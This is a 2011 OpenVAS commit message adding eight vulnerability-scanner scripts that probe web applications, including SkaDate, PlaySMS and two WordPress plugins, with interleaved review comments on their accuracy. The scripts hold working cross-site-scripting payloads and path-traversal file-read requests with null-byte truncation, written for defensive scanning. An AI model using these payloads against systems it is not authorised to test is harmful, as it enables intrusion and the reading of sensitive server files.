[Openvas-commits] r11658 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Sep 22 13:43:28 CEST 2011


Author: mime
Date: 2011-09-22 13:43:24 +0200 (Thu, 22 Sep 2011)
New Revision: 11658

Added:
   trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl
   trunk/openvas-plugins/scripts/gb_igallery_49712.nasl
   trunk/openvas-plugins/scripts/gb_papoo_49587.nasl
   trunk/openvas-plugins/scripts/gb_playsms_49474.nasl
   trunk/openvas-plugins/scripts/gb_skadate_49502.nasl
   trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl
   trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl
   trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/ChangeLog	2011-09-22 11:43:24 UTC (rev 11658)
@@ -1,3 +1,15 @@
+2011-09-22  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_yabsoft_image_hosting_script_49457.nasl,
+	scripts/gb_GeoClassifieds_49475.nasl,
+	scripts/gb_wordpress_49691.nasl,
+	scripts/gb_skadate_49502.nasl,
+	scripts/gb_playsms_49474.nasl,
+	scripts/gb_igallery_49712.nasl,
+	scripts/gb_wordpress_49713.nasl,
+	scripts/gb_papoo_49587.nasl:
+	Added new plugins.
+
 2011-09-22  Veerendra G.G <veerendragg at secpod.com>,
 
 	* scripts/secpod_atutor_mult_vuln.nasl,
@@ -14,7 +26,7 @@
 
 2011-09-20 Thomas Reinke <reinke at securityspace.com>
 
-	scripts/CA_License_Service_Stack_Overflow.nasl,
+	* scripts/CA_License_Service_Stack_Overflow.nasl,
 	scripts/RHSA_2008_0787.nasl,
 	scripts/RHSA_2009_0001.nasl,
 	scripts/RHSA_2009_0009.nasl,

Added: trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# GeoClassifieds Lite Multiple Cross Site Scripting and SQL Injection Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103270);
+ script_bugtraq_id(49475);
+ script_version ("1.0-$Revision$");
+
+ script_name("GeoClassifieds Lite Multiple Cross Site Scripting and SQL Injection Vulnerabilities");
+
+desc = "Overview:
+GeoClassifieds Lite is prone to multiple SQL-injection and cross-site
+scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-
+based authentication credentials, compromise the application,
+access or modify data, or exploit latent vulnerabilities in the
+underlying database.
+
+GeoClassifieds Lite 2.0.1, 2.0.3.1, 2.0.3.2 and 2.0.4 are vulnerable;
+other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/49475
+http://www.geodesicsolutions.com/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed GeoClassifieds is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/index.php?a=19&c=</div><script>alert(/openvas-xss-test/);</script>"); 
+
+  if(http_vuln_check(port:port,url:url,pattern:"<script>alert\(/openvas-xss-test/\);</script>",check_header:TRUE,extra_check:"powered by GeoClassifieds")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+
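Review bot: The title, description and `script_name` announce SQL injection as well as cross-site scripting, but the only probe (L135–L137) is a reflected-XSS check, so a positive result is reported with more certainty than the scan has established; the summary should say what was actually verified, e.g. `script_summary("Determine if installed GeoClassifieds is prone to a cross-site scripting vulnerability");`, and the description should note that the SQL-injection part is not tested. The request at L135 also puts raw `<`, `>` and `/` characters into the request line, as do gb_papoo_49587.nasl (L339) and gb_skadate_49502.nasl (L539), whereas gb_igallery_49712.nasl (L236) and gb_yabsoft_image_hosting_script_49457.nasl (L861) percent-encode them; servers or intermediaries that reject unencoded request lines would then yield a false negative, so the encoding should be made consistent across the batch. `include("host_details.inc")` (L123) brings in nothing the script uses and can be dropped.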


Property changes on: trunk/openvas-plugins/scripts/gb_GeoClassifieds_49475.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_igallery_49712.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_igallery_49712.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_igallery_49712.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# i-Gallery 'd' Parameter Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103263);
+ script_bugtraq_id(49712);
+ script_version ("1.0-$Revision$");
+
+ script_name("i-Gallery 'd' Parameter Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+i-Gallery is prone to a cross-site scripting vulnerability because it
+fails to properly sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site. This could allow the attacker to steal cookie-based
+authentication credentials and launch other attacks.
+
+i-Gallery 3.4 is vulnerable; other versions may also be affected.
+
+
+References:
+http://www.securityfocus.com/bid/49712
+http://www.b-cp.com/igallery/download.asp
+";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if i-Gallery is prone to a cross-site scripting vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_asp(port:port))exit(0);
+
+dirs = make_list("/igallery","/gallery",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/igallery.asp?d=%22%3E%3Cscript%3Ealert%28%27openvas-xss-test%27%29%3C/script%3E"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\('openvas-xss-test'\)</script>")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+
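Review bot: The check at L238 accepts any response that reflects the injected marker, with neither `check_header:` nor `extra_check:`, so a catch-all error page or any other application under `/gallery` or a cgi_dirs() entry that echoes the query string will trigger `security_warning`; the other XSS scripts in this commit at least pass `check_header:TRUE`, and gb_GeoClassifieds_49475.nasl and gb_papoo_49587.nasl also anchor on a product string. Add `check_header:TRUE` and an `extra_check:` keyed to a string that only the i-Gallery page emits (placeholder: `extra_check:"<IGALLERY_PAGE_MARKER>"`, to be confirmed against a real install). The same missing `extra_check:` applies to gb_skadate_49502.nasl (L541) and gb_yabsoft_image_hosting_script_49457.nasl (L863). `include("global_settings.inc")` at L225 is unused here.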


Property changes on: trunk/openvas-plugins/scripts/gb_igallery_49712.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_papoo_49587.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_papoo_49587.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_papoo_49587.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Papoo CMS Light Multiple Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103268);
+ script_bugtraq_id(49587);
+ script_version ("1.0-$Revision$");
+
+ script_name("Papoo CMS Light Multiple Cross Site Scripting Vulnerabilities");
+
+desc = "Overview:
+Papoo CMS Light is prone to multiple cross-site scripting
+vulnerabilities because it fails to properly sanitize user-
+supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and
+script code in the browser of an unsuspecting user in the context of
+the affected site. This may let the attacker steal cookie-based
+authentication credentials and launch other attacks.
+
+Papoo CMS Light 4.0 is vulnerable; other versions may also be
+affected.
+
+Solution:
+Updates are available. Please see the references for more details.
+
+References:
+http://www.securityfocus.com/bid/49587
+http://www.papoo.de/
+http://www.securityfocus.com/archive/1/519612";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed Papoo CMS is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/cms","/papoo",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir,'/index.php/"></a><script>alert(/openvas-xss-test/);</script>'); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\(/openvas-xss-test/\);</script>",check_header:TRUE,extra_check:"Papoo")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_papoo_49587.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_playsms_49474.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_playsms_49474.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_playsms_49474.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PlaySMS 'apps_path[themes]' Parameter Multiple Remote File Include Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103271);
+ script_bugtraq_id(49474);
+ script_version ("1.0-$Revision$");
+
+ script_name("PlaySMS 'apps_path[themes]' Parameter Multiple Remote File Include Vulnerabilities");
+
+desc = "Overview:
+PlaySMS is prone to multiple remote file-include
+vulnerabilities because the application fails to sufficiently
+sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to obtain
+sensitive information or to execute arbitrary script code in the
+context of the webserver process. This may allow the attacker to
+compromise the application and the underlying computer; other attacks
+are also possible.
+
+PlaySMS 0.9.5.2 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/49474
+http://playsms.sourceforge.net/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed PlaySMS is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/sms","/playsms",cgi_dirs());
+files = traversal_files();
+
+foreach dir (dirs) {
+
+  foreach file (keys(files)) {
+   
+    url = string(dir,"/plugin/themes/default/page_forgot.php?apps_path[themes]=/",files[file],"%00"); 
+
+    if(http_vuln_check(port:port, url:url,pattern:file)) {
+     
+      security_warning(port:port);
+      exit(0);
+
+    }
+  }
+}
+exit(0);
+
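Review bot: The probe at L442–L444 confirms a local file read through `apps_path[themes]` (path traversal with a trailing `%00`), not the remote file include that the title, `script_name` and description claim, so the report text should describe what was actually verified, e.g. `script_summary("Determine if PlaySMS is prone to a file-include vulnerability");`. The NUL-byte truncation this relies on is ignored by newer PHP releases, so a negative result does not show the parameter is safe; a comment above the loop should say so, e.g. `# depends on NUL-byte path truncation; newer PHP builds ignore it, so a miss is not proof of absence`. The description also lacks the `Solution:` section that gb_papoo_49587.nasl and gb_wordpress_49713.nasl carry.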


Property changes on: trunk/openvas-plugins/scripts/gb_playsms_49474.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_skadate_49502.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_skadate_49502.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_skadate_49502.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# SkaDate 'blogs.php' Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103269);
+ script_bugtraq_id(49502);
+ script_version ("1.0-$Revision$");
+
+ script_name("SkaDate 'blogs.php' Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+SkaDate is prone to a cross-site scripting vulnerability because it
+fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in
+the browser of an unsuspecting user in the context of the affected
+site. This may help the attacker steal cookie-based authentication
+credentials and launch other attacks.
+
+References:
+http://www.securityfocus.com/bid/49502
+http://www.skadate.com";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if SkaDate is prone to a cross-site scripting vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/blog",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/blogs.php?tag=gamecat+<script>alert(/openvas-xss-test/)</script>"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\(/openvas-xss-test/\)</script>",check_header:TRUE)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+
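Review bot: The description at L500–L511 names no affected SkaDate version and has no `Solution:` section, unlike every other description in this commit, so a reader of the report cannot tell whether their release is in scope; if the advisory gives no version, say so explicitly, e.g. `Affected versions are not known at the time of writing; other versions may also be affected.`. The dependency on `/blog` (L535) as a default directory is an assumption not documented anywhere in the script and deserves a one-line comment. `include("global_settings.inc")` at L528 is not used.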


Property changes on: trunk/openvas-plugins/scripts/gb_skadate_49502.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WordPress Mailing List Plugin 'wpabspath' Parameter Remote File Include Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103267);
+ script_bugtraq_id(49691);
+ script_version ("1.0-$Revision$");
+
+ script_name("WordPress Mailing List Plugin 'wpabspath' Parameter Remote File Include Vulnerability");
+
+desc = "Overview:
+The Mailing List plug-in for WordPress is prone to a remote file-
+include vulnerability because it fails to sufficiently sanitize user-
+supplied input.
+
+Exploiting this issue could allow an attacker to compromise the
+application and the underlying system; other attacks are also
+possible.
+
+Mailing List 1.3.2 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/49691
+http://wordpress.org/extend/plugins/mailz/
+http://wordpress.org/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed WordPress is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_wordpress_detect_900182.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port, app:"WordPress"))exit(0);
+files = traversal_files();
+
+foreach file (keys(files)) {
+   
+  url = string(dir,"/wp-content/plugins/mailz/lists/config/config.php?wpabspath=/",files[file]); 
+
+  if(http_vuln_check(port:port, url:url,pattern:file)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+
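Review bot: `script_summary` at L615 says "installed WordPress is vulnerable", but the check targets only the Mailing List plugin at a fixed path under `/wp-content/plugins/mailz/`, so the summary should name the plugin, e.g. `script_summary("Determine if the WordPress Mailing List plugin is vulnerable");`. The URL at L640 is built as `dir + "/wp-content/..."` while the sibling script gb_wordpress_49713.nasl (L747) hard-codes `"//wp-content/..."` for the same `dir` source; whichever form is intended, the two should agree and carry a comment explaining the slash handling when `dir` is the site root. `include("version_func.inc")` at L628 is unused, and the description has no `Solution:` section.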


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_49691.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WordPress Adsense Extreme Plugin 'adsensextreme[lang]' Parameter Remote File Include Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103264);
+ script_bugtraq_id(49713);
+ script_version ("1.0-$Revision$");
+
+ script_name("WordPress Adsense Extreme Plugin 'adsensextreme[lang]' Parameter Remote File Include Vulnerability");
+
+desc = "Overview:
+The Adsense Extreme plug-in for WordPress is prone to a remote
+file-include vulnerability because it fails to sufficiently
+sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the
+application and the underlying system; other attacks are also
+possible.
+
+Adsense Extreme 1.0.3 is vulnerable; other versions may also be
+affected.
+
+Solution:
+Updates are available. Please see the references for more details.
+
+References:
+http://www.securityfocus.com/bid/49713
+http://wordpress.org/extend/plugins/adsense-extreme/
+http://wordpress.org/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed WordPres is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_wordpress_detect_900182.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+if(!dir = get_dir_from_kb(port:port, app:"WordPress"))exit(0);
+
+files = traversal_files();
+
+foreach file (keys(files)) {
+
+  variables = string("adsensextreme[lang]=/",files[file],"%00");
+  filename  = string(dir,"//wp-content/plugins/adsense-extreme/adsensextremeadminpage.php");
+  host      = get_host_name();
+
+  req = string(
+      "POST ", filename, " HTTP/1.1\r\n", 
+      "Referer: ","http://", host, filename, "\r\n",
+      "Host: ", host, ":", port, "\r\n", 
+      "Content-Type: application/x-www-form-urlencoded\r\n", 
+      "Content-Length: ", strlen(variables), 
+      "\r\n\r\n", 
+      variables
+  );
+
+  result = http_send_recv(port:port, data:req, bodyonly:FALSE);
+
+  if(egrep(pattern: file, string: result, icase: TRUE)) {
+
+    security_warning(port:port);
+    exit(0);
+
+  }
+
+}
+
+exit(0);
+
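Review bot: `script_summary` at L720 misspells the product, `"Determine if installed WordPres is vulnerable"`; it should read `script_summary("Determine if the WordPress Adsense Extreme plugin is vulnerable");`, which also names the actual target rather than WordPress core. `filename` and `host` (L747–L748) do not depend on the loop variable and should be computed once before the `foreach` at L744. The hard-coded double slash in `"//wp-content/plugins/adsense-extreme/..."` at L747 differs from the single slash used in gb_wordpress_49691.nasl (L640); if the doubled slash is deliberate it needs a comment, otherwise it should be `"/wp-content/..."`.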


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_49713.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl	2011-09-22 11:27:08 UTC (rev 11657)
+++ trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl	2011-09-22 11:43:24 UTC (rev 11658)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# YABSoft Advanced Image Hosting Script 'report.php' Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103272);
+ script_bugtraq_id(49457);
+ script_version ("1.0-$Revision$");
+
+ script_name("YABSoft Advanced Image Hosting Script 'report.php' Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+YABSoft Advanced Image Hosting Script is prone to a cross-site
+scripting vulnerability because it fails to properly sanitize user-
+supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site. This may let the attacker steal cookie-based authentication
+credentials and launch other attacks.
+
+Advanced Image Hosting Script 2.3 is vulnerable; other versions may
+also be affected.
+
+References:
+http://www.securityfocus.com/bid/49457
+http://yabsoft.com/aihs-feature.php";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed ABSoft Advanced Image Hosting Script is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/images",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/report.php?img_id=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\(/openvas-xss-test/\)</script>",check_header:TRUE)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+
